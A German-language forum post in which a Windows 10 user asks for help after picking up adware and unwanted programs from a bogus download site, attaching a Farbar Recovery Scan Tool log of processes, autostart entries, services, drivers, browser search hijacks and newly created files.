Win 10: jede Menge PUP

BaBi · 13.02.2017, 19:36

Hallo zusammen,

gestern wollte ich mir Software herunterladen und bin wohl auf einer falschen Seite gelandet und habe mir jede Menge Mist eingefangen. Dummerweise habe ich bisher versäumt, einen Virenscanner zu installieren. :Stirn:

Frst.txt

Zitat:

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 12-02-2017
durchgeführt von Barbara (Administrator) auf BARBARA-PC (13-02-2017 19:07:20)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Geladene Profile: Barbara (Verfügbare Profile: Barbara)
Platform: Windows 10 Pro Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Edge)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Computer, Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
() C:\ProgramData\Logic Handler\set.exe
() C:\Program Files (x86)\da002918-daba-4445-a323-cc3eefdf9d091486934027\protda002918-daba-4445-a323-cc3eefdf9d09.tmpfs
() C:\Windows\SysWOW64\NetUtils2016.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
() C:\ProgramData\NetworkPacketManitor\Nettrans.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Search Module Ltd.) C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe
() C:\ProgramData\Zaamla\Zaamla.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
() C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe
() C:\Program Files (x86)\SystemHealer\HealerConsole.exe
(Microsoft Corporation) C:\Windows\System32\runonce.exe
() C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe
(PC Clean Plus) C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe
() C:\Users\Barbara\AppData\Roaming\Event Monitor\em.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Spotify Ltd) C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
() C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
() C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
() C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-23] (Microsoft Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [gplyra] => C:\Users\Barbara\AppData\Roaming\gplyra\gplyra\start.cmd [216 2017-01-10] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKLM-x32\...\Run: [BestCleaner] => C:\Program Files (x86)\BeCleaner\BestCleaner.exe [180736 2017-02-10] () <===== ACHTUNG
HKLM-x32\...\Run: [MyMemory] => C:\Program Files (x86)\MyMemory\MyMemory.exe [7572480 2017-02-07] (TODO: <Company name>) <===== ACHTUNG
HKLM-x32\...\Run: [AppTrailers] => C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe [47824832 2016-09-29] () <===== ACHTUNG
HKLM\...\RunOnce: [OMEWPRODUCT_HYWXX] => C:\Program Files (x86)\BeCleaner\9J3PGU1187X4TMA.exe [153088 2017-02-12] (UREVJU) <===== ACHTUNG
HKLM\...\RunOnce: [wd] => C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe [248320 2017-02-12] () <===== ACHTUNG
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify Web Helper] => C:\Users\Barbara\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1444976 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Spotify] => C:\Users\Barbara\AppData\Roaming\Spotify\Spotify.exe [7153264 2016-12-31] (Spotify Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [Steam] => c:\Program Files (x86)\Steam\steam.exe [2851408 2016-07-09] (Valve Corporation)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-26] (Piriform Ltd)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [JG5BHCSAVC] => C:\Program Files\IQ50062YNB\IQ50062YN.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [LAMMPX75X6] => C:\Program Files\WR5TG73LV7\WR5TG73LV.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [XN55R0BYZD] => C:\Program Files\P3ZUK80JKY\P3ZUK80JK.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [JLAWFPN14I] => C:\Program Files (x86)\BeCleaner\KDGFQ.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [x5o3Yv2CQw.exe] => C:\Users\Barbara\AppData\Roaming\{e96-e1-84-c5451-ad240-9cea-aa139}\x5o3Yv2CQw.exe [635392 2017-02-12] (Abakita)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [zC6b23GTAV.exe] => C:\Users\Barbara\AppData\Roaming\{e96-e1-84-c5451-ad240-9cea-aa139}\zC6b23GTAV.exe [839680 2017-02-12] (Skoat)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Run: [GWH9N93A6U] => C:\Program Files\8K5F5GX6AI\8K5F5GX6A.exe [759808 2017-02-12] (UREVJU)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [806400 2016-07-16] (Microsoft Corporation)
HKLM\...\Providers\pfqv62f8: C:\Program Files (x86)\Atikationbogot System\local64spl.dll [316928 2017-02-12] ()
AppInit_DLLs: C:\ProgramData\Zaamla\ItTone.dll => C:\ProgramData\Zaamla\ItTone.dll [358912 2017-02-12] ()
AppInit_DLLs-x32: C:\ProgramData\Zaamla\Stockdax.dll => C:\ProgramData\Zaamla\Stockdax.dll [248320 2017-02-12] ()
ShellExecuteHooks: Kein Name - {12BEB57E-ECD3-11E6-A98A-64006A5CFC23} - C:\Users\Barbara\AppData\Roaming\Zrshfcit\Griotain.dll [151040 2017-02-12] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{92a07177-073c-4d90-93ea-d374613fc39e}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLxxeue_LfBniAwPOzhhFS9wqdYjLMPBpDF_cFF10OMductpH2orS0SPHJ15zmib i1UNejSP02PSmH5BeJQj1SlwLAsV&q={searchTerms}
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLBQ-yUvPMKJd_hXouLV6TefGjkhjHVNrNwcsUwRBbMirINNU5piuT97tFvj4PSdGQMEe5e6hmP11fdFwVSJM1MfPXvr
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLxxeue_LfBniAwPOzhhFS9wqdYjLMPBpDF_cFF10OMductpH2orS0SPHJ15zmib i1UNejSP02PSmH5BeJQj1SlwLAsV&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1500252791-3377746768-789393517-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLxxeue_LfBniAwPOzhhFS9wqdYjLMPBpDF_cFF10OMductpH2orS0SPHJ15zmib i1UNejSP02PSmH5BeJQj1SlwLAsV&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1500252791-3377746768-789393517-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPl4avjwkCJLSoZr_uhKUhX_yjr7dKvLxG_Cmm097zDweFv4Gjv7QPsLqrQClpJSfTDL7KDPwfK5YDeLxxeue_LfBniAwPOzhhFS9wqdYjLMPBpDF_cFF10OMductpH2orS0SPHJ15zmib i1UNejSP02PSmH5BeJQj1SlwLAsV&q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-07-30] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-07-30] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: 8rnx3iua.default
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\8rnx3iua.default\Profiles\8rnx3iua.default [nicht gefunden]
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default [2017-02-12]
FF NewTab: Mozilla\Firefox\Profiles\8rnx3iua.default -> C:\\ProgramData\\Zaamlas\\ff.NT
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\8rnx3iua.default -> youndoo
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\8rnx3iua.default -> youndoo
FF Homepage: Mozilla\Firefox\Profiles\8rnx3iua.default -> about:home
FF Keyword.URL: Mozilla\Firefox\Profiles\8rnx3iua.default -> hxxp://www-searching.com/search.aspx?site=shdefault1&prd=smw&pid=s&shr=d&q={searchTerms}&s=H2Czbcnbl1AU,e757b544-b7e3-4f69-a055-fbd9a7e08b83,
FF Extension: (2020 3D Viewer for IKEA) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\2020Player_IKEA@2020Technologies.com [2016-12-16]
FF Extension: (Firefox Hotfix) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-01]
FF Extension: (Ghostery) - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\Extensions\firefox@ghostery.com.xpi [2017-02-12]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-16] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-07-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-07-30] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S2 75c01d6e164de53703a6a972b8072a72; C:\Program Files\75c01d6e164de53703a6a972b8072a72\bdd7b1f8de41e5dd7822ff604fc87f53.exe [39236096 2017-02-10] () [Datei ist nicht signiert] <==== ACHTUNG
S2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 backlh; C:\ProgramData\Logic Handler\set.exe [3786752 2017-02-12] () [Datei ist nicht signiert]
R2 Bonjour Service; C:\Program Files (x86)\Bonjour\mDNSResponder.exe [229376 2006-02-28] (Apple Computer, Inc.) [Datei ist nicht signiert]
S2 Dalidom; C:\Program Files (x86)\Plidaing\Konoghstuqtainmodule.dll [154624 2017-02-12] () [Datei ist nicht signiert]
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-09-03] (Macrovision Europe Ltd.) [Datei ist nicht signiert]
S2 Hayzumflex; C:\ProgramData\\Hayzumflex\\Hayzumflex.exe [983040 2017-02-12] () [Datei ist nicht signiert]
R2 Nettrans; C:\ProgramData\NetworkPacketManitor\Nettrans.exe [43520 2017-02-12] () [Datei ist nicht signiert]
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2017-02-12] ()
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-01-20] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2142728 2016-10-22] (Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [2209296 2016-10-22] (Electronic Arts)
R2 OtherSearch; C:\Program Files (x86)\vpF0TnTYqt\kl.dll [1107456 2017-02-11] () [Datei ist nicht signiert] <==== ACHTUNG
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2889896 2016-09-15] (Microsoft Corporation)
R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3109888 2017-02-12] (Search Module Ltd.) [Datei ist nicht signiert]
S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [1450064 2016-07-09] (Valve Corporation) [Datei ist nicht signiert]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 Zaamla; C:\ProgramData\\Zaamla\\Zaamla.exe [983040 2017-02-12] () [Datei ist nicht signiert]
R2 gemeloki; C:\Program Files (x86)\da002918-daba-4445-a323-cc3eefdf9d091486934027\protda002918-daba-4445-a323-cc3eefdf9d09.tmpfs [X]
S2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R1 f200152859a3da102f1abf6a29e00daf; C:\WINDOWS\system32\drivers\f200152859a3da102f1abf6a29e00daf.sys [95048 2017-02-10] (REMFFW) <==== ACHTUNG
R1 Lace514; C:\WINDOWS\System32\drivers\Lace_wpf_x64.sys [69400 2017-02-09] (Lace514)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-02-12] () <==== ACHTUNG
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispiwu.inf_amd64_b67dc924fff8de6d\nvlddmkm.sys [14199224 2017-01-04] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-01-20] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2017-01-20] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-01-20] (NVIDIA Corporation)
R2 Sentinel64; C:\WINDOWS\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc.)
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2017-02-12] ()
S3 SNTUSB64; C:\WINDOWS\System32\drivers\SNTUSB64.SYS [63528 2011-05-27] (SafeNet, Inc.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S1 cvjjfjaa; \??\C:\WINDOWS\system32\drivers\cvjjfjaa.sys [X]
U3 idsvc; kein ImagePath

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-02-13 19:07 - 2017-02-13 19:07 - 00000000 ____D C:\FRST
2017-02-13 19:06 - 2017-02-13 19:07 - 00000000 ____D C:\Users\Barbara\Desktop\Virenscanner etc
2017-02-12 22:20 - 2017-02-12 22:20 - 00000000 ____D C:\ProgramData\3e6b6889-0047-0
2017-02-12 22:16 - 2017-02-13 19:06 - 00000000 ____D C:\Users\Barbara\AppData\Local\AppTrailers
2017-02-12 22:16 - 2017-02-12 22:16 - 00326144 _____ C:\ProgramData\smp2.exe
2017-02-12 22:16 - 2017-02-12 22:16 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2017-02-12 22:16 - 2017-02-12 22:16 - 00004420 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_323832303833353732332d374a55414134502a576c4a5a
2017-02-12 22:16 - 2017-02-12 22:16 - 00004246 _____ C:\WINDOWS\System32\Tasks\SMW_P
2017-02-12 22:16 - 2017-02-12 22:16 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppTrailers
2017-02-12 22:16 - 2017-02-12 22:16 - 00000000 ____D C:\ProgramData\SearchModule
2017-02-12 22:16 - 2017-02-12 22:16 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2017-02-12 22:16 - 2017-02-12 22:16 - 00000000 ____D C:\Program Files\8K5F5GX6AI
2017-02-12 22:15 - 2017-02-13 19:06 - 00000000 ____D C:\Program Files (x86)\vpF0TnTYqt
2017-02-12 22:15 - 2017-02-12 22:24 - 00000000 ____D C:\ProgramData\Zaamla
2017-02-12 22:15 - 2017-02-12 22:20 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\System Healer
2017-02-12 22:15 - 2017-02-12 22:16 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\AppTrailers
2017-02-12 22:15 - 2017-02-12 22:15 - 01938537 _____ C:\Users\Barbara\AppData\Roaming\Tonex.bin
2017-02-12 22:15 - 2017-02-12 22:15 - 01907481 _____ C:\Users\Barbara\AppData\Roaming\Flex-Fix.tst
2017-02-12 22:15 - 2017-02-12 22:15 - 00024494 _____ C:\WINDOWS\System32\Tasks\{7D0D0E47-797A-7F7A-7D11-7D797E041105}
2017-02-12 22:15 - 2017-02-12 22:15 - 00003690 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2017-02-12 22:15 - 2017-02-12 22:15 - 00003686 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2017-02-12 22:15 - 2017-02-12 22:15 - 00003420 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
2017-02-12 22:15 - 2017-02-12 22:15 - 00003360 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2017-02-12 22:15 - 2017-02-12 22:15 - 00003350 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2017-02-12 22:15 - 2017-02-12 22:15 - 00002052 _____ C:\WINDOWS\System32\Tasks\EhXuia58iw
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____H C:\WINDOWS\system32\BITB228.tmp
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\One System Care
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\Zaamlas
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Socia2Sear Browser Enhancer
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\f09cf6fd-6885-0
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\f09cf6fd-67a5-1
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\3e6b6889-6e95-0
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\ProgramData\3e6b6889-6d45-1
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2017-02-12 22:15 - 2017-02-12 22:15 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2017-02-12 22:15 - 2017-02-12 22:14 - 00983040 _____ C:\Users\Barbara\AppData\Roaming\Flex-Fix.exe
2017-02-12 22:14 - 2017-02-13 19:05 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-02-12 22:14 - 2017-02-13 19:05 - 00003110 _____ C:\WINDOWS\System32\Tasks\RunAtStartup
2017-02-12 22:14 - 2017-02-13 19:05 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\PC Clean Plus
2017-02-12 22:14 - 2017-02-13 19:05 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Event Monitor
2017-02-12 22:14 - 2017-02-12 22:27 - 00003184 _____ C:\WINDOWS\System32\Tasks\PC Clean Plus
2017-02-12 22:14 - 2017-02-12 22:24 - 00000312 _____ C:\WINDOWS\Tasks\PC Clean Plus_UPDATES.job
2017-02-12 22:14 - 2017-02-12 22:24 - 00000304 _____ C:\WINDOWS\Tasks\PC Clean Plus_DEFAULT.job
2017-02-12 22:14 - 2017-02-12 22:15 - 00000000 ____D C:\Program Files\75c01d6e164de53703a6a972b8072a72
2017-02-12 22:14 - 2017-02-12 22:14 - 01938537 _____ C:\Users\Barbara\AppData\Roaming\Bioity.bin
2017-02-12 22:14 - 2017-02-12 22:14 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-02-12 22:14 - 2017-02-12 22:14 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2017-02-12 22:14 - 2017-02-12 22:14 - 00278520 _____ C:\Users\Barbara\AppData\Roaming\SonZoolux.bin
2017-02-12 22:14 - 2017-02-12 22:14 - 00003294 _____ C:\WINDOWS\System32\Tasks\PC Clean Plus_DEFAULT
2017-02-12 22:14 - 2017-02-12 22:14 - 00003274 _____ C:\WINDOWS\System32\Tasks\HDWallPaper
2017-02-12 22:14 - 2017-02-12 22:14 - 00003120 _____ C:\WINDOWS\System32\Tasks\PC Clean Plus_UPDATES
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\WINDOWS\SysWOW64\sstmp
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\WINDOWS\system32\SSL
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\HDWallPaper
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\gplyra
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Users\Barbara\AppData\Local\Reabation
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Clean Plus
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HDWallPaper
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\ProgramData\Logic Handler
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Program Files (x86)\pccleanplus
2017-02-12 22:14 - 2017-02-12 22:14 - 00000000 ____D C:\Program Files (x86)\PC Clean Plus
